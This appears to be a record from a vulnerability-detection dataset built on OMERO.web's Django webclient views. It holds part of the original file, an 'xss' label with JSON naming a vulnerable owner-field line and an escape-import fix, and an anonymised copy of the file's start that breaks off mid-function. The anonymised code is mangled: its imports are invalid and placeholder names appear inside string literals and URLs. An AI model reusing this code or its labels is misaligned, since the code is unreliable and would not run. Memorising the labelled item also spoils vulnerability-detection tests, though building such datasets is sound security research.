return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
try:
params = scriptService.getParams(sId)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
# upload new file
fileupload = (
"file_annotation" in request.FILES and request.FILES["file_annotation"] or None
)
fileAnnId = None
if fileupload is not None and fileupload != "":
manager = BaseContainer(conn)
fileAnnId = manager.createFileAnnotations(fileupload, [])
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
if key == "File_Annotation" and fileAnnId is not None:
inputMap[key] = pclass(str(fileAnnId))
continue
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == "RMapI":
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
pval = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(pval) > 0:
listClass = pval[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except Exception:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if "IDs" in inputMap and "Data_Type" in inputMap:
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup("-1")
try:
firstObj = conn.getObject(
inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
)
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
except Exception:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
"""Script upload UI"""
if request.method != "POST":
return {"template": "webclient/scripts/upload_script.html"}
# Get script path, name and text
script_path = request.POST.get("script_path")
script_file = request.FILES["script_file"]
script_file.seek(0)
script_text = script_file.read().decode("utf-8")
if not script_path.endswith("/"):
script_path = script_path + "/"
script_path = script_path + script_file.name
# If script exists, replace. Otherwise upload
scriptService = conn.getScriptService()
script_id = scriptService.getScriptID(script_path)
try:
if script_id > 0:
orig_file = OriginalFileI(script_id, False)
scriptService.editScript(orig_file, script_text)
message = "Script Replaced: %s" % script_file.name
else:
script_id = scriptService.uploadOfficialScript(script_path, script_text)
message = "Script Uploaded: %s" % script_file.name
except omero.ValidationException as ex:
message = str(ex)
return {"Message": message, "script_id": script_id}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in imageIds]),
}
inputMap["Format"] = wrap("OME-TIFF")
rsp = run_script(request, conn, sId, inputMap, scriptName="Create OME-TIFF")
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = "in progress"
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
}
request.session.modified = True
except Exception as x:
jobId = str(time()) # E.g. 1312803670.6076391
# handle python 2 or 3 errors
message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if message and message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = "no processor available"
message = "" # template displays message and link
else:
# Don't log user mistake as ERROR
if isinstance(x, omero.ValidationException):
logger.debug(x.message)
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = "failed"
message = x.message
# save the error to http session, for display in 'Activities' window
request.session["callback"][jobId] = {
"job_type": "script",
"job_name": scriptName,
"start_time": datetime.datetime.now(),
"status": status,
"Message": message,
"error": error,
}
return {"status": status, "error": error}
return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(
conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
)
)
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {
"created": str(created),
"ago": ago(created),
"id": annId,
"download": download,
}
return rv # will get returned as json by default
| xss | {
"code": [
" \"owner\": r[\"owner\"],"
],
"line_no": [
1796
]
} | {
"code": [
"from django.utils.html import escape"
],
"line_no": [
38
]
} |
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import .is_safe_url
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
VAR_51 = None
VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
if VAR_52 is not None:
VAR_51 = VAR_241(VAR_52)
return VAR_51
def FUNC_1(VAR_2, VAR_3):
VAR_51 = VAR_2.GET.getlist(VAR_3)
return [VAR_320 for VAR_320 in VAR_51 if VAR_320 != ""]
def FUNC_2(VAR_2, VAR_3):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
def FUNC_4(VAR_5):
if not is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
VAR_5 = VAR_352("webindex")
return VAR_5
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
VAR_53 = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
VAR_53["template"] = settings.INDEX_TEMPLATE
except Exception:
VAR_53["template"] = "webclient/VAR_93.html"
VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
VAR_53["template"] = "webclient/VAR_93.html"
return VAR_53
class CLASS_0(LoginView):
VAR_54 = "webclient/login.html"
VAR_55 = "OMERO.web"
def FUNC_81(self, VAR_2):
return self.handle_not_logged_in(VAR_2)
def FUNC_82(self, VAR_2, VAR_6, VAR_56):
if VAR_2.session.get("active_group"):
if (
VAR_2.session.get("active_group")
not in VAR_6.getEventContext().memberOfGroups
):
del VAR_2.session["active_group"]
if VAR_2.session.get("user_id"):
del VAR_2.session["user_id"]
if VAR_2.session.get("server_settings"):
del VAR_2.session["server_settings"]
if VAR_2.POST.get("noredirect"):
return HttpResponse("OK")
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is None or len(VAR_5) == 0:
try:
VAR_5 = parse_url(settings.LOGIN_REDIRECT)
except Exception:
VAR_5 = VAR_352("webindex")
else:
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
if VAR_22 is None:
VAR_339 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
if VAR_339 is not None:
VAR_115 = {"server": unicode(VAR_339)}
VAR_22 = LoginForm(VAR_115=initial)
else:
VAR_22 = LoginForm()
VAR_53 = {
"version": omero_version,
"build_year": build_year,
"error": VAR_57,
"form": VAR_22,
}
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is not None and len(VAR_5) != 0:
VAR_53["url"] = urlencode({"url": VAR_5})
if hasattr(settings, "LOGIN_LOGO"):
VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
VAR_340 = VAR_352("webindex")
if settings.PUBLIC_URL_FILTER.search(VAR_340):
VAR_53["public_enabled"] = True
VAR_53["public_login_redirect"] = VAR_340
VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
VAR_341 = re.match(
(
r"(?P<major>\VAR_364+)\."
r"(?P<minor>\VAR_364+)\."
r"(?P<patch>\VAR_364+\.?)?"
r"(?P<dev>(dev|a|b|rc)\VAR_364+)?.*"
),
omero_version,
)
VAR_342 = "^VAR_416%s\\.%s\\.[^-]+$" % (
VAR_341.group("major"),
VAR_341.group("minor"),
)
VAR_53["client_download_tag_re"] = VAR_342
VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
return HttpResponse("OK")
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
FUNC_8(VAR_2)
if VAR_5 is None or VAR_5.startswith(VAR_352("change_active_group")):
VAR_5 = VAR_352("webindex")
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_8(VAR_2, VAR_8=None):
if VAR_8 is None:
VAR_8 = FUNC_0(VAR_2, "active_group", None)
if VAR_8 is None:
return
VAR_8 = int(VAR_8)
if (
"active_group" not in VAR_2.session
or VAR_8 != VAR_2.session["active_group"]
):
VAR_2.session.modified = True
VAR_2.session["active_group"] = VAR_8
def FUNC_9(VAR_2, VAR_9="All members"):
VAR_58 = (
VAR_2.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", VAR_9)
)
return {
"id": -1,
"omeName": VAR_58,
"firstName": VAR_58,
"lastName": "",
}
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "POST":
try:
try:
VAR_6.close()
except Exception:
VAR_0.error("Exception during FUNC_10.", exc_info=True)
finally:
VAR_2.session.flush()
return HttpResponseRedirect(VAR_352(settings.LOGIN_VIEW))
else:
VAR_53 = {"url": VAR_352("weblogout"), "submit": "Do you want to log out?"}
VAR_54 = "webgateway/base/includes/post_form.html"
return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
VAR_2.session.modified = True
VAR_54 = VAR_7.get("template", None)
if VAR_54 is None:
if VAR_10 == "userdata":
VAR_54 = "webclient/VAR_158/containers.html"
elif VAR_10 == "usertags":
VAR_54 = "webclient/VAR_158/containers.html"
else:
VAR_54 = "webclient/%s/%s.html" % (VAR_10, menu)
VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
try:
VAR_242 = VAR_59.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
VAR_60 = VAR_59.initially_open_owner
if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
):
return HttpResponseRedirect("%s?VAR_5=%s" % (VAR_352("weblogin"), VAR_5))
if VAR_242 is not None:
VAR_20 = VAR_242.details.group.id.val
if VAR_6.isValidGroup(VAR_20):
FUNC_8(VAR_2, VAR_20)
else:
VAR_242 = None
VAR_61 = {}
VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
if VAR_10 == "search":
if VAR_62.is_valid():
VAR_61["query"] = VAR_62.cleaned_data["search_query"]
VAR_5 = VAR_7.get("load_template_url", None)
if VAR_5 is None:
VAR_5 = VAR_352(viewname="load_template", args=[VAR_10])
VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
VAR_65 = [u.id for u in VAR_63]
VAR_65.extend([u.id for u in VAR_64])
VAR_66 = VAR_2.GET.get("experimenter")
if VAR_60 is not None:
if VAR_2.session.get("user_id", None) != -1:
VAR_66 = VAR_60
try:
VAR_66 = VAR_241(VAR_66)
except Exception:
VAR_66 = None
if VAR_66 is not None:
if (
VAR_66
not in (
set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
)
and VAR_66 != -1
):
VAR_66 = None
if VAR_66 is None:
VAR_66 = VAR_2.session.get("user_id", None)
if VAR_66 is None or int(VAR_66) not in VAR_65:
if VAR_66 != -1: # All VAR_166 in VAR_101 is allowed
VAR_66 = VAR_6.getEventContext().userId
VAR_2.session["user_id"] = VAR_66
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_312=lambda x: x.getName().lower())
VAR_68 = VAR_67
VAR_69 = ContainerForm()
VAR_70 = {}
if VAR_10 == "search":
for g in VAR_68:
g.loadLeadersAndMembers()
for VAR_383 in g.leaders + g.colleagues:
VAR_70[VAR_383.id] = VAR_383
VAR_70 = list(VAR_70.values())
VAR_70.sort(VAR_312=lambda x: x.getLastName().lower())
VAR_53 = {
"menu": VAR_10,
"init": VAR_61,
"myGroups": VAR_67,
"new_container_form": VAR_69,
"global_search_form": VAR_62,
}
VAR_53["groups"] = VAR_68
VAR_53["myColleagues"] = VAR_70
VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
VAR_53["initially_select"] = VAR_59.initially_select
VAR_53["initially_open"] = VAR_59.initially_open
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["current_url"] = VAR_5
VAR_53["page_size"] = settings.PAGE
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
VAR_53["search_default_user"] = settings.SEARCH_DEFAULT_USER
VAR_53["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
return FUNC_11(VAR_2=request, VAR_10=menu, VAR_6=conn, VAR_5=url, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_312=lambda x: x.getName().lower())
if VAR_6.isAdmin(): # Admin can see all VAR_68
VAR_243 = [
VAR_6.getAdminService().getSecurityRoles().userGroupId,
VAR_6.getAdminService().getSecurityRoles().guestGroupId,
]
VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
VAR_68.sort(VAR_312=lambda x: x.getName().lower())
else:
VAR_68 = VAR_67
for g in VAR_68:
g.loadLeadersAndMembers() # load VAR_63 / VAR_64
VAR_53 = {
"template": "webclient/base/includes/FUNC_13.html",
"current_url": VAR_5,
"groups": VAR_68,
"myGroups": VAR_67,
}
return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_68 = tree.marshal_groups(
VAR_6=conn, VAR_244=member_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
try:
VAR_11 = VAR_241(VAR_11)
except ValueError:
return HttpResponseBadRequest("Invalid VAR_343 id")
try:
if VAR_11 < 0:
VAR_343 = FUNC_9(VAR_2)
else:
VAR_343 = tree.marshal_experimenter(
VAR_6=conn, VAR_11=experimenter_id
)
if VAR_343 is None:
raise Http404("No Experimenter found with ID %s" % VAR_11)
return JsonResponse({"experimenter": VAR_343})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_11 = FUNC_0(VAR_2, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_71 = dict()
try:
VAR_71["projects"] = tree.marshal_projects(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["datasets"] = tree.marshal_datasets(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["screens"] = tree.marshal_screens(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["plates"] = tree.marshal_plates(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
try:
VAR_344 = VAR_2.session["server_settings"]["ui"]["tree"]["orphans"]
except Exception:
VAR_344 = {"enabled": True}
if (
VAR_6.isAdmin()
or VAR_6.isLeader(VAR_337=VAR_2.session.get("active_group"))
or VAR_11 == VAR_6.getUserId()
or VAR_344.get("enabled", True)
):
VAR_247 = tree.marshal_orphaned(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_247["name"] = VAR_344.get("name", "Orphaned Images")
VAR_71["orphaned"] = VAR_247
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_71)
@login_required()
def FUNC_17(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_245 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_107 = tree.marshal_datasets(
VAR_6=conn, VAR_245=project_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"datasets": VAR_107})
@login_required()
def FUNC_18(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_246 = FUNC_0(VAR_2, "id", None)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_249 = FUNC_3(VAR_2, "thumbVersion", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_25 = "share_id" in VAR_7 and VAR_241(VAR_7["share_id"]) or None
try:
VAR_106 = tree.marshal_images(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_246=dataset_id,
VAR_25=share_id,
VAR_248=load_pixels,
VAR_20=group_id,
VAR_87=page,
VAR_250=date,
VAR_249=thumb_version,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"images": VAR_106})
@login_required()
def FUNC_19(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_251 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
try:
VAR_110 = tree.marshal_plates(
VAR_6=conn, VAR_251=screen_id, VAR_20=group_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": VAR_110})
@login_required()
def FUNC_20(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_252 = FUNC_0(VAR_2, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_252 is None:
return HttpResponseBadRequest("id (VAR_421) must be specified")
try:
VAR_253 = tree.marshal_plate_acquisitions(
VAR_6=conn, VAR_252=plate_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": VAR_253})
def FUNC_21(VAR_6, VAR_12, VAR_13, VAR_14, VAR_15):
if VAR_12 == "orphaned":
return None
VAR_72 = None
if VAR_12 == "experimenter":
if VAR_14 in ["dataset", "plate", "tag"]:
return None
elif VAR_12 == "project":
if VAR_14 == "dataset":
VAR_72 = "ProjectDatasetLink"
elif VAR_12 == "dataset":
if VAR_14 == "image":
VAR_72 = "DatasetImageLink"
elif VAR_12 == "screen":
if VAR_14 == "plate":
VAR_72 = "ScreenPlateLink"
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_72 = "AnnotationAnnotationLink"
if not VAR_72:
raise Http404("json VAR_158 needs 'parent_type' and 'child_type'")
VAR_73 = omero.sys.ParametersI()
VAR_73.addIds(VAR_15)
VAR_74 = VAR_6.getQueryService()
VAR_75 = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:VAR_187)
"""
% VAR_72
)
if VAR_13:
VAR_73.add("pid", rlong(VAR_13))
VAR_75 += " and olink.parent.id = :pid"
VAR_76 = VAR_74.findAllByQuery(VAR_75, VAR_73, VAR_6.SERVICE_OPTS)
if VAR_13 is not None and len(VAR_76) == 0:
raise Http404(
"No VAR_346 found for %s-%s to %s-%s"
% (VAR_12, VAR_13, VAR_14, VAR_15)
)
return VAR_72, VAR_76
def FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16):
if VAR_12 == "experimenter":
if VAR_14 == "dataset" or VAR_14 == "plate":
return "orphan"
if VAR_12 == "project":
VAR_254 = ProjectI(VAR_241(VAR_13), False)
if VAR_14 == "dataset":
VAR_345 = DatasetI(VAR_241(VAR_16), False)
VAR_346 = ProjectDatasetLinkI()
VAR_346.setParent(VAR_254)
VAR_346.setChild(VAR_345)
return VAR_346
elif VAR_12 == "dataset":
VAR_345 = DatasetI(VAR_241(VAR_13), False)
if VAR_14 == "image":
VAR_142 = ImageI(VAR_241(VAR_16), False)
VAR_346 = DatasetImageLinkI()
VAR_346.setParent(VAR_345)
VAR_346.setChild(VAR_142)
return VAR_346
elif VAR_12 == "screen":
VAR_384 = ScreenI(VAR_241(VAR_13), False)
if VAR_14 == "plate":
VAR_421 = PlateI(VAR_241(VAR_16), False)
VAR_346 = ScreenPlateLinkI()
VAR_346.setParent(VAR_384)
VAR_346.setChild(VAR_421)
return VAR_346
elif VAR_12 == "tagset":
if VAR_14 == "tag":
VAR_346 = AnnotationAnnotationLinkI()
VAR_346.setParent(TagAnnotationI(VAR_241(VAR_13), False))
VAR_346.setChild(TagAnnotationI(VAR_241(VAR_16), False))
return VAR_346
return None
def FUNC_23(VAR_6, VAR_14, VAR_15):
if VAR_14 == "tag":
VAR_14 = "Annotation"
VAR_77 = {}
for VAR_38 in VAR_6.getObjects(VAR_14, VAR_15):
VAR_77[VAR_38.id] = VAR_38.details.owner.id.val
return VAR_77
@login_required()
def FUNC_24(VAR_2, VAR_6=None, **VAR_7):
